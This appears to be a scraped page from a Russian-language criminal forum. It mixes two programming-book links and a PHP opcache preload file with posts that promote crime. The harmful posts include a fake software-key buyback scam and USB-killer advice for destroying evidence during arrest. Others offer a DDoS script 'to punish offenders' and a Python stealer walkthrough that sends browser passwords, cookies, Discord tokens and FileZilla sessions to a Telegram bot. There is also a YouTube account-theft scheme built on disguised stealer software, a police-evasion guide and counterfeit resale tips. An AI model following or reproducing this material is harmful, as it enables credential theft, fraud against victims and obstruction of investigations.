preload the files in this * list. Add this file to your `php.ini` in `opcache.preload` to preload this list into * PHP at startup. Additionally, this file also includes information about Opcache. * * * Add (or update) this line in `php.ini`: * * opcache.preload=/www/app/vendor/preload.php * * --- Config --- * Generated at: 2019-11-20 15:20:49 UTC * Opcache * - Used Memory: 130585 B * - Free Memory: 294896 B * - Wasted Memory: 347764 B * - Cached files: 2675 * - Hit rate: 94% * - Misses: 542 * Preloader config * - Memory limit: 32 MB * - Overwrite: false * - Files excluded: 0 * - Files appended: 0 */ require_once '/www/app/vendor/autoload.php'; $files = [ '/www/app/ClassFoo.php', '/www/app/ClassBar.php', '/www/app/ClassBaz.php', '/www/app/ClassQuz.php', '/www/app/ClassQux.php', '/www/app/vendor/author/package/src/Example.php', // ... ]; foreach ($files as $file) { require_once $file; } И всё. Попробуйте сами: ТЫК
  6. admin

    Practices of the Python Pro (2020)

    Practices of the Python Pro (2020) Разработчики-профессионалы знают о преимуществах написания хорошо организованного и читабельного кода. Изучая и следуя приведённым в книге советам и шаблонам, вы научитесь проектировать чистое, легко поддерживаемое программное обеспечение, используя Python. Книга подойдет всем, кто собирается начать изучение этого языка программирования. Practices_of_the_Python_Pro.pdf
  7. Создаем фейк-сайт крупной компании софта. Нашей тематикой будет амерское лицензионное программное обеспечение для предприятий. Размещаем на буксах объявление: "Куплю ключ от "Mamont-soft" по цене от 150 руб/шт. Не могу купить их на официальном сайте "адрес моего магазина" т.к. уже совершил три покупки. Перевожу тут вам 1 рубль и на киви все остальное, что бы не оплачивать комиссию. Для проверки ключа пришлите мне первые 2 и последние 3 символа из имени ключа, я проверю на валидность, затем переведу вам деньги и вы вышлете мне весь ключ целиком" Выкупаем у "работяг" сначала 1 ключик (больше они и не купят для первого раза), благодарим и пишем что он может обращаться в любое время напрямую к нам в личку, выкупим любые объемы. На этом этапе он убедился что нет никакого обмана и идет закупать ключи дальше. Второй раз, допустим, он взял у нас 2-3 ключа. Покупаем их у него, благодарим и пишем также, мол, приноси больше ключей, скупаю любые объемы. На этом этапе чувак понимает, что нащупал кнопку-бабло. А вот в третий раз, когда он закупил большое колличество ключей на нашем сайте и стучит в личку, чтоб мы купили их - пишем ему: Извините, в данный момент мне нинада, только что купил 100500 штук.
  8. Обычно у человека со стороны, не интересующегося расследованиями преступлений хакеров, может возникнуть логичный вопрос: ведь есть шифрование операционной системы и криптоконтейнеры, почему хакеры его не используют? Используют, но хакеру могут просто зажать палец дверью и получить пароль, потому шифрование – отличное решение в теории, а на практике лучше, чтобы выдавать пароль было просто не к чему. Иногда на задержанного давят угрозой отправить в СИЗО до суда в случае отказа выдать данные и предлагают подписку о невыезде или домашний арест в случае согласия сотрудничать. USB-киллер может решить проблему хакера: если подобное устройство, замаскированное под флешку, вставить в USB-порт, то оно необратимо выведет из строя материнскую плату, и компьютер «умрет». Но самое главное, на месте будет практически невозможно установить причину «смерти» компьютера, а хакер всегда сможет вздохнуть и сказать: «Эх, он давно на ладан дышал». USB-киллер не уничтожит жесткий диск, и в лаборатории его извлекут, но к тому времени у хакера уже будет адвокат и дело будет на этапе следствия, никто не станет засовывать палец в дверь или менять меру пресечения. USB-киллеры можно найти в интернет-магазинах и на AliExpress. Подобная флешка кладется около компьютера, на нее наносится надпись, например «данные» или «материалы по работе» (задача этой надписи – привлечь внимание). Хакер может добровольно выдать флешку или дождаться, когда любопытные недоброжелатели сами вставят ее в устройство. Конечно, есть небольшая вероятность, что они вставят ее в свое устройство, и тогда проблем не избежать. Но у задержанного хакера и так большие проблемы, а задача ловушки – вывести из строя компьютер с данными в тот момент, когда сам задержанный это сделать уже не сможет. Если у вac MacBook из последних моделей, в котором USB-порты изолированы от материнской платы, это не сработает. При использовании USB-killer данные на жестком диске компьютера, скорее всего, повреждены не будут.
  9. admin

    DDoS инструмент

    DDoS инструмент, который позволит вам наказать обидчиков, либо протестировать конкурентов) Вам нужно в коде изменить example com -> на свой сайт для атаки. sekas.py
  10. admin

    этичное хакерство

    Братуленчики, привет! Метори выкатывает курс по этичному хакерству. Это практически тоже самое, что и хакерство (навыки и знания одни и те же), но круче. В перспективе и денег приносит больше. Курс наисвежайший - от 2019 года! Скажем точно - кто владеет этой наукой, будет править балом в 21 веке! P.s. Так как курс свежий, он записан на английском языке (не успели перевести), но присутствуют русские субтитры. Чему вы научитесь после прохождения курса? Введение в этический взлом! Что это? Создание собственной лаборатории этического взлома Проникновение в сеть (WIFI Hacking) Получение доступа к системам (взлом системы) Поддержание доступа Мобильный взлом Проникновение на сайт (веб-хакерство) После эксплуатации Безопасность и смягчение последствий Кали Линукс Wireshark Взлом WEP, WPA и WPA2 шифрования MITM Attack и многое другое Требования Интерес стать сертифицированным этическим хакером Никаких предварительных условий не требуется Программа курса: 1. Введение в этический взлом! Что это: Вступление Зачем учиться взлому 2. Настройка лабораторной среды: Лаборатория. Введение. Установка Kali Linux с использованием готового образа Установка Kali Linux с помощью ISO-образа Установка Windows Установка Metasploitable Как создавать снимки 3. Основы Kali Linux: Kali Linux Обзор Терминал и основные команды Linux Обновление списка источников и установка программ 4. Тестирование проникновения в сеть: Тестирование проникновения в сеть Введение Как работают сети Подключение беспроводного адаптера Изменение MAC-адреса Режимы беспроводного монитора и как их изменить 5. Тестирование проникновения в сеть - атаки перед подключением: Обнюхивание пакетов с помощью Airodump-ng1 Целевое прослушивание пакетов с помощью Airodump-ng1 Атака де-аутентификации (отключение любого устройства от сети) Создание поддельной точки доступа - теория Создание поддельной точки доступа - практично 6. Тестирование проникновения в сеть - получение доступа к сетям: Получение доступа к сетям Введение Взлом WEP-шифрования - теория Взлом WEP-шифрования (основной случай) Взлом WEP-шифрования (поддельная аутентификация) Взлом WEP-шифрования (ARP Replay Attack) Взлом WPA & WPA2 Шифрование (Эксплуатация WPS) - Теория Взлом WPA & WPA2 Encryption (Эксплуатация WPS) - Практично Взлом шифрования WPA и WPA2 (с использованием Wifite) Взлом WPA & WPA2 Encryption (захват рукопожатия) - теория Шифрование WPA и WPA2 (захват рукопожатия) - практично Создание списка слов с помощью Crunch Запуск атаки по списку слов для взлома пароля WPA и WPA2 Защищать себя от атак сверху 7. Проникновение в сеть - атаки после подключения: Введение в почтовые атаки Сбор информации с помощью Netdiscover Введение в Nmap и как его использовать Сетевое сканирование с использованием nmap Сетевое сканирование с использованием Zenmap MITM Attack - отравление ARP (теория) MITM Attack - отравление ARP с использованием arpspoof Атака MITM - отравление ARP с использованием MITMf Обход HTTPS с использованием MITMf Сессия угон и кража куки Подмена DNS с использованием MITMF Захват нажатий клавиш и запуск любого кода в браузере Target Запуск MITM-атак в реальной среде Базовый обзор Wireshark Захват и анализ пакетов с помощью Wireshark Чтение имен пользователей, паролей и файлов cookie из пакета захвата 8. Проникновение в сеть - обнаружение и безопасность: Обнаружение ARP-отравляющих атак Обнаружение подозрительных действий с помощью Wireshark 9. Получение доступа к компьютерам - атаки на стороне сервера: Введение в получение доступа к компьютерам Введение в атаки на стороне сервера Сбор информации и использование неверной конфигурации Использование публичного эксплойта для взлома сервера Использование уязвимости удаленного выполнения кода Установка и настройка сообщества Metasploit Для кого этот курс: Любой, кто интересуется этическим взломом и тестированием на проникновение Язык: Английский с субтитрами качай тут
  11. Предлагаю вам ознакомиться с минимальным набором софта, который пригодится вам и вашей анонимной заднице. Поехали! 1) STZBlaster – программа для изменения имени ПК, хоста, ID процессора, HDD volume, MAC adress и много другого. Также в программе дополнительно можно изменить региональные настройки. Единственное, что хочу отметить, так это то, что не стоит доверять ей смену МАС. 2) RMOSChange.exe – программа меняет HTTP-заголовки популярных браузеров. Суть программы, и зачем она нужна? Во-первых, если включены скрипты, то передаются такие данные, как версия браузера, язык браузера, user-agent, ОС. Не будет ли странным, если мы зайдем на шелл с русского браузера, но через американский socks\ssh? Во-вторых, если вы пользуетесь америкосовским или буржуйским дедиком\соксом\впн, то нужно менять настройки под IE, т.к. там это самый популярный браузер. Зачем это нужно, я думаю, рассказывать не стоит. 3) SMAC 2.0 – программа спуффит МАС-адреса сетевой платы. Можно менять раз месяц МАС-адреса и все будет ок. 4) Privacy Suite Main Menu – криптуем и прячем свой, уже созданный TrueCrypt’ом контейнер в jpg, wav файлы. Также можно создать сейф. Еще неоспоримый плюс данного софта – он безвозвратно уничтожает файлы. Также можно криптовать на флешку. Также открываем зашифрованный контейнер без необходимости повторной установки софтины. 5) TrueCrypt – думаю, что это лучшая софтина по шифрованию данных. 6) Proxyfier – простой проксификатор. Есть возможность задать приложение, которое нужно соксифицировать. 7) OpenVPN GUI – OpenVPN-клиент, нужен для подключения к vpn-серверу. 8) VPSProxy – суть программы в том, что мы используем залитые гейты на шеллы\хостинги\сервера как соксы. Ключевая фича софта в том, что входящий и исходящий гейт постоянно меняется. Юзать только поверх vpn/ssh. 9) VMware workstation – самая популярная программа для виртуализации систем. Зачем нужна? Все очень просто, опять же, если у вас в браузере включены скрипты (что нужно для шеллов), то вместе с ip,dns и т.п. передается еще и язык ОС. Схема проста, ставим варю, далее покупаем backdoor-патч на варю, либо юзаем тот, что в паблике (если найдете патч без виря, то вам повезло). Берем и кидаем весь серый софт на варю. Если почуяли что-то неладное, то трем нах Privacy Suite'ой и форматируем в NTFS какой-нибудь программой. 10) O&O SafeErase – программа, которой стоит доверять безвозвратное удаление файлов. Это минимальный набор софта, который должен быть у каждого, кто занимается лихими делами, пусть даже и не сильно грязными.
  12. (Google Chrome, Chromium, Amigo, Opera, Яндекс.Браузер) Функционал: Скриншот рабочего стола Стиллинг токена Discord Стиллинг сессий FileZilla Логи отправляются в Telegram Приступим! Создаём боту у @BotFather копируем ток бота, идем в диалог и начинаем диалог, далее переходим к этой боте @userinfobot и узнаём свой идентификатор чата. С ботом закончили, открываем cmd и пишем следующие команды: pip install pyTelegramBotAPI pip install win32crypt pip install telebot Теперь открываем IDE и начинаем кодить: Импортируем нужные библиотеки: импорт ОС Теперь объявляем переменную username, которая содержит имя пользователя: username = os.getlogin () Переменные для работы с ботом телеграм: token = 'ВАШ_ТОКЕН_ОТ_БОТА' Сейчас будем воровать пароли от хрома (комментарии отмечены # / # комментарий): def Chrome (): # Создаём функцию Теперь воруем куки из хрома: def Chrome_cockie (): Воруем куки из Яндекса Браузера: def Яндекс (): Пароли браузеров на основе хрома: def chromium (): Куки браузеров на основе Chromium: def chromiumc () Пароли Amigo: def Amigo (): Куки Амиго: def Amigo_c (): Воруем пароли с Оперы: def Opera (): Куки Оперы: def Opera_c (): Теперь будем воровать DISCORD токен: def discord_token (): Воруем Сессии FileZilla: def filezilla (): Делаем скриншот рабочего стола: screen = ImageGrab.grab () Теперь сохраняем все данные в архиве: zname = r'D: \ LOG.zip '# создаем переменную - название и местоположение файла Теперь добавим переменную документацию: doc = open ("D: \ LOG.zip", 'rb') Отправляем сообщение в телеграм бота: bot.send_document (ВАШ ЧАТИД, док)
  13. 1. Как работает VPN и SSH туннели. VPN и SSH туннель - это очень схожие по алгоритму работы штуки. Туннели даже называют VPN-ом для бедных. Работает это все так: при подключении к VPN создается шифрованный канал связи, и все данные на VPN передаются зашифрованными протоколом SSL 1/2/3 версии. Может быть, в интернете вы сможете найти даже VPN с TLS шифрованием. И каждый раз, когда вы нажимаете в адресной строке своего браузера Enter, запрос посылается не на сайт который вы ввели в адресную строку, а в зашифрованном виде на VPN. Там он расшифровывается и выполняется, а результат (страница в браузере, VPN работает на все запросы в сеть из всех приложений на компьютере) отправляется вам. Похоже на принцип прокси. Это он и есть. VPN выступает зашифрованным прокси-сервером между вами и всеми интернет-соединениями на вашем ПК. 2. Дедик, VPN - это не средства анонимности. Многие люди думают, что подключившись к VPN от hide.me, они становятся дикими анонимусами. Что-ж, не ловко рушить их влажные фантазии, однако это вряд ли спасет их от зоны. Дело в том, что почти все VPN в интернетах ведут логи, которые они с радостью выдадут товарищу майору. Просто потому, что предоставление услуг VPN - это бизнес. А когда к тебе приходят граждане в форме, приходится выполнять их требования, чтобы сохранить возможность дальше вести бизнес. А вы например уверены, что чел, который предоставляет услуги VPN, его компания и он сам находится в другой стране? А уверены ли вы в том, что силовые структуры вашей страны не имеют власти над шефом VPN? А теперь тоже самое, но про модера, или технического работника этого VPN? А как на счет варианта, когда спецслужбы и полицейские сами открывают такой сайт по предоставлению услуг VPN в ходе оперативно-розыскных, или профилактических мероприятий? Я уж не упоминаю возможность того, что на сервере с VPN есть уязвимость, или админ этого сервиса вообще настолько глупый, что высылает логи не просто по официальному указу, а даже по электронной почте или телефонному звонку. Да, бывает и такое. Собственно, к дедикам относится все тоже самое, поэтому я их упомянул в подзаголовке. 3. VPN без логов и чистка логов на дедике. Ни для кого не секрет, что по разным нелегальным форумам пиарятся разные сервисы VPN, которые обещают отсутствие логов. Во-первых, проверить это можно только имея IP сервера и пароль от root пользователя. Но даже тут есть проблема в том, что логи ведет провайдер VPN, и твой провайдер интернета тоже. По закону положено. С дедиками, собственно, та же хурма. Только там еще добавляется тот фактор, что ты никогда не узнаешь точное кол-во мест, куда пишутся логи на конкретно твоем сервере, нет ли там какого-то скрытого пула, и не пишутся ли логи над самим дедиком. И никакие софты, которые "чистят логи после вашего выхода" вам не помогут. 4. Как полицейские вычислят тебя, спрятавшегося за VPN или VDS. Для начала, когда они установят IP с которого было предполагаемое преступление, они смотрят с какой страны этот IP. Если не из твоей, то они в ходе COPM узнают IP адрес, который в заданном промежутке времени отправлял пакеты (те самые, зашифрованные, о которых я рассказывал в подзаголовке об VPN) на IP адрес, с которого было нарушение. Так, если правонарушение совершал неопытный пользователь, то против него уже на этом моменте появляется практически прямые улики. Дальше дело за малым - спросить логи у провайдера касательно подозреваемого, изучить их, и провести задержание. 5. Взлом SSL. SSL шифрование, которое юзают почти все VPN и туннели, было взломано. Это означает, что трафик который вы гоните через VPN больше можно вовсе не считать зашифрованным, и анонимность теряется. 6. TOR. Многие пытаются решить все проблемы ТОР. И тут целый ряд проблем. Я бы сказал, диагнозов. И имя этому диагнозу - безграмотность. Во-первых, вы никогда не скроете от сайта, что сидите через ТОР, луковичная сеть открыта, и настройки браузера тоже вас палят. Вторая - то, что выходные ноды ТОР часто логируются держателями этих самых нод. Я только хочу этим сказать, что используя ТОР все ваши авторизационные данные (от биткоин кошелька, например) запросто могу украсть. Или шантажировать вас содержанием ваших запросов, которые вы отправляли с ТОР. Вы ведь не смешные картинки смотреть заходили через луковичный браузер, да? Принцип работы ТОР похож на луковицу, именно поэтому на логотипе не молот, а именно лук. Запросы через ТОР браузер передаются от 1 ретранслятора (принцип ретрансляции в ТОР похож на принцип сотовых башен у операторов GSM, это обычные компьютеры активистов, которые позволили ТОР использовать свой компьютер как промежуточный или даже конечный пункт в многослойных ТОР запросах. Такие компьютеры называются нодами, или ретрансляторами). От вашего компьютера он улетел на ноду № 21323, от нее к 284, потом на 3289, потом на 9819, потом на 13981 и так далее, очень много слоев, разных стран мира. В конце концов ваш запрос для товарища майора теряется где-то среди этих нод и стран, и он уже не имеет полномочий и желаний его распутывать дальше. Принцип луковицы. Догнали? И само собой, в этой сети из луковых слоев, есть слой который является последним. То есть слой, который отправляет запрос в интернет и возвращает его вам. Этот "слой" называют выходных ретранслятором. И он получает уже расшифрованные данные, то есть ваши логины и пароли в открытом виде. Ну, или хотя бы ваши кукисы. Все это очень часто коллекционируется и люди делают на этом деньги. 7. Фингерпринты. У разных хороших и не очень хороших сайтов есть куча способов идентифицировать твой компуктер даже когда ты почистил все кукисы, переустановил 20 раз браузер, и ваще заходишь через виртуальную машину. Все эти штуки называются фингерпринтами. Например, уникальный номер твоего процессора. Это самое простое. А еще есть фингерпринты основанные на наборе шрифтов, и я даже видел где-то фингерпринт, который идентифицирует пользователей по компьютерной мышки. У них у всех разная скорость реакции, и прочие параметры. Я не помню всех деталей, но если интересно - погуглите. Помимо всех этих штук, есть еще такая неприятная вещь, как LSO Cookie. Это куки-файлы твоего флеш-плагина в браузере. Дело в том, что посещенные тобой сайты записываются не только тебе в историю, но еще и в онлайн-банк с такими кукисами, и по ним тоже можно тебя идентифицировать. А еще есть Ever cookie, это те самые «вечные» куки файлы, которые прячутся в больше количество мест на твоем компьютере и их довольно трудно удалить. 8. Double VPN. Цепочка VPN может состоять не из одного сервера VPN, к которому вы присоединяетесь, а из двух, трех, четырех (это Double, Triple, Quadro - соответственно) соединения. Они более устойчивы, и на них уже не действует уловка, описанная в пункте 4, когда полицейские просто смотрели, с какого IP был заход на IP VPN и вычисляли того, кто за ним прятался. Спасибо что дочитал :) Бонус статья, пища для ума. Адвертинг (от англ. advert, advertising) — относительно новый вид мошенничества, суть которого заключается в краже аккаунтов путём подставной рекламной кампании. Это значит, что на просторах интернета можно найти огромное множество наивных жертв, даже не догадывающихся о его существовании. Цель адвертинга Ключевой целью адвертинга, как и многих других черных схем, является получение и перепродажа аккаунта жертвы, обладающей некоторой популярностью на видеохостинге Youtube. Главным критерием таких каналов является количество подписчиков и наличие монетизации на видеороликах. Рабочая сила Распределение рабочей силы в адвертинге сильно напоминает нам антикино. Во главе стоит человек, который как и в случае с антикино, владеет сайтом, как правило всего одним, он же делает выплаты основной части рабочей силы - спамерам. Также в схеме присутствует дополнительно обученный человек, обрабатывающий приходящие логи (аккаунты). Как это работает. Владелец регистрирует домен, создает сайт для якобы рекламируемого ПО и загружает его на хостинг. Далее в работу вступают спамеры, они просматривают множество каналов, подходящих под критерии и пишут сообщения их владельцам. Они представляют «начинающий проект», нуждающийся в рекламе и утверждают, что заплатят немалую сумму за его рекламу. При этом, задача спамера создать из себя образ рекламного менеджера и заставить жертву скачать программу, в которую уже вшит стиллер. Если жертва согласится и запустит программу, стиллер похитит все данные с ее компьютера и отправит на сервер, а вместо запуска программы выйдет ложная ошибка отсутствия различных библиотек DLL. Далее специальный человек обрабатывает лог, находит данные от аккаунта Google и перепривязывает его на себя (чаще всего без 24-часовой задержки) за процент от стоимости. На этом этапе спамер уведомляет жертву, что ошибка передана разработчикам и извиняется за неудобства, впоследствии чего общение прекращается. Перепродажа Получение каналов YouTube, как уже было сказано в начале статьи, не является конечной целью этой цепочки. Владелец, после получения данных от аккаунта, перепродает его уже определенным людям, а затем распределяет полученную сумму по процентам среди работников. Общение Для успешного общения спамеру требуется знание навыков социальной инженерии, психологической манипуляции и конечно же, русского языка, иначе шанс успеха близится к нулю. Общаться нужно без ошибок, представиться менеджером по рекламе, желательно в деловом стиле. Обязательно обращаться на «Вы» и придерживаться шаблонного общения. Залог успеха Ну что-же, подытожим. Для грамотного разводе жертв надо иметь: навыки СИ на достаточном уровне, сайт (лендинг), обдуманный продукт пиара и опытные спамеры. Также не стоит выбирать каналы с широкой аудиторией, потому-что такие аккаунты как правило легко восстанавливаются, или же, если жертва узнает о попытке обмана, может осветить это на своем канале, что нам, конечно же, не нужно. Меры предосторожности Адвертинг - мошенническая афера, поэтому пренебрегать мерами предосторожности не стоит: не используйте настоящие аккаунты в соц.сетях, буде анонимны. Не используйте Tor в качестве браузера на вашем основном ПК, т.к у провайдера есть данные, что вы заходите именно в Tor, а не в другой любой браузер. Используйте "рабочий ноут", VPN, а еще лучше удаленный сервер (дедик), никогда не говорите что вы главный в цепочке. Впрочем, эти основные вещи вы и так знаете. До скорых встреч, всех обнял.
  14. admin

    полупасив с Ebay

    Добрый вечер. Бизнес, построенный по модели купи - продай является простым и бессмертным способом заработка для новичка, с него время начинают многие, ибо когда-то эта ниша позволит заработать стартовый капитал для более серьезных проектов. Нам потребуется: Начальный капитал: примерно 500 рублей (минимум). Чем больше, тем лучше. Временные затраты: Первый день 2-2.5 часа, далее 3-20 минут в день. Профит: 3000-5000 в месяц. В чем суть? А суть в том, чтобы выложить какой-либо товар на ebay, выставив цену, допустим в 5 баксов. В это же время на Алиэкспресс этот товар стоит 1 доллар. Профит примерно в 3 бакса с одной продажи (из-за комиссии). Далее покупаем на Али, указываем адрес покупателя с ибея, ждем 21 день, получаем тройной профит. В день покупается 2-3 товара с белого аккаунта. С серых - как получится (1-3 в неделю). Теперь то, к чему я пришёл, пытаясь реализовать эту схему: 1) Надо найти товар, аналогов которому очень мало (или нет совсем). Это тяжело, поэтому шарим по алиэкспрессу сначала 2 часа. 2) Хочешь больших бабок - покупаешь акк на ebay с рейтингом 250-500 минимум. Иначе будут брать очень неохотно. 3) Язык и до Киева доведёт. Я вышел на хорошие бабки, когда списался с китайцем. Этому пиздюку 14 лет и он барыжит охренительными копиями брендовых шмоток, косметики и всякой херни. 4) Нарушаешь правила - нарушай с левого аккаунта. Твой пусть приносит тебе 2-3 к в месяц, но будет чистым и без нареканий. 5) Самый кайфовый товар (для белого аккаунта) - косметика. Ей всегда можно приписать чудодейственные свойства. 6) Китайцы совсем не шарят в превьюшках товаров. Если продаём, то преподносим красиво, а не сплошной копипаст. На этом все, удачи!
  15. Pro Python System Administration — Rytis Sileika (en) 2010 Как применять Python для решения задач системного администрирования. Pro Python System Administration (en).pdf